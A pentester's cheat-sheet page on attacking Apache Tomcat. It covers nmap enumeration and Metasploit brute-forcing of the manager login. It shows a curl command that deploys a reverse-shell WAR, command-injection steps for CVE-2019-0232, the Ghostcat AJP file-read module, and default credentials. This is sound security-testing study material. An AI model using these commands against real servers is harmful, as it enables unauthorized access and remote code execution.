Apache Tomcat
Apache Tomcat is an open-source web server. It provides a Java HTTP web server environment in which Java code can run.
- GitHub (7.2k β)
- Documentation (βͺ)
The version 11 is still in development. The previous major versions are version 10 (2021), version 9 (2018), and version 8 (2016).
A java web application can use either or both servlets and JSPs. A combination of both is the most common architecture.
- Servlets β: the whole logic is in Java
- JSP π²: html-like template files in which we can add Java logic to handle input and create interactive pages.
The admin panel to upload applications if usually at /manager/html
. To upload an application, you need to package it as a WAR archive. Each app is deployed at a URI, and index.jsp
is loaded by default (else error).
Pentester Notes β οΈ
- You can try tomcatWarDeployer (0.4k β, 2022 πͺ¦), but it's memory hungry, buggy, unstable, and you need to patch the code first πͺ¦. It's a multipurpose tool (from enumeration to exploitation, albeit basic).
Enumeration
- You can use nmap. It often runs on port 8080.
$ sudo nmap IP -sCV -v
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
-
We can often easily recognize a website using Apache Tomcat from the presence of the
JSESSIONID
cookie while we may also trigger an error to see the error message page layout. Additionally, the URI/docs
may be available and expose Tomcat version. -
Maybe Sprint Boot Actuators are being used.
-
We can disclose tomcat version by sending a query using an invalid method that should raise a 405 (ex:
curl -X PUT URL
)
Foothold
-
If you close the login prompt, you may see default credentials
-
We can try to brute force the manager account using metasploit.
$ msfconsole -q
msf6> use auxiliary/scanner/http/tomcat_mgr_login
msf6> set RHOSTS <target>
msf6> set STOP_ON_SUCCESS true
msf6> set ANONYMOUS_LOGIN true
msf6> set BLANK_PASSWORDS true
msf6> run
Exploitation
-
If you have access to the manager, you can try to upload a reverse shell. Refer to reverse shell#tomcat for more information.
-
You can also try to use metasploit to upload a reverse shell
-
You can use cURL to upload a WAR too:
$ curl --upload-file revshell.war -u 'username:password' "URL/manager/text/deploy?path=/shell"
Well-known CVEs
-
CVE-2019-0232: on Windows host, if there is a cgi script and
enableCmdLineArguments
was enabled (default to disabled), it can be exploited to arbitrarily run commands.
You must find the CGI directory which is often /cgi
or /cgi-bin/
and find at least one script. Use URL/xxx/yyy.bat?&dir
to execute dir
.
- Use
+
instead of spaces. Use\
in paths. - Don't forgot to URL encode the payload.
- Use redirections when needed (e.g.
dir+>+output
to create 'output'). - Display environment variables using
&set
. IfPATH
is not set, you have to use the full path (e.g.c:\windows\system32\whoami.exe
).
You can use the metasploit module tomcat_cgi_cmdlineargs
.
Apache AJP
Apache AJP is a wire protocol. It allows a web server such as Apache to talk to tomcat. A few notes:
- π² It runs on port 8009/TCP (by default)
- πͺ¦ It's not often exposed
- π We need to configure a webserver to communicate with it
While uncommon, if a tomcat website is behind a firewall, but the AJP port is exposed, we can use AJP to access the 'hidden' tomcat website.
AJP Exploitation
$ git clone https://github.com/hypn0s/AJPy.git && cd AJPy
$ python tomcat.py --port 8009 "version" IP
<print tomcat manager version>
AJP Well-known CVEs
-
CVE-2020-1938: unauthenticated LFI that can be used to read files in the webroot, such as
WEB-INF/web.xml
orWEB-INF/cgi/xxx.bat
. Apache JServ which usually runs on port8009
must be exposed.
It can be exploited using metasploit:
msf6> use auxiliary/admin/http/tomcat_ghostcat
The file web.xml
contains the manager credentials if they were defined.
π» To-do π»
Stuff that I found, but never read/used yet.
- apache-tomcat-pentesting
- Jetty - it seems like an alternative
-
/manager/status
server status (admin:admin) - not the same credentials on each page
- when uploading, on the same page, there are information about the server architecture, which we can use to fine tune the payload
-
jar -ft revshell.jar
/jd-gui
: to see metasploit endpoint name - when pressing ESC on login, it may print the message with the default credentials
-
/etc/tomcat9/<config files>
-
web.xml
,tomcat-users.xml
-
SESSIONS.ser
While not really related:
-
/control/xmlrpc
,/webtools/control/main
,/control/checkLogin
- Try default credentials (
admin:ofbiz
) - CVE-2023-50164 lead to RCE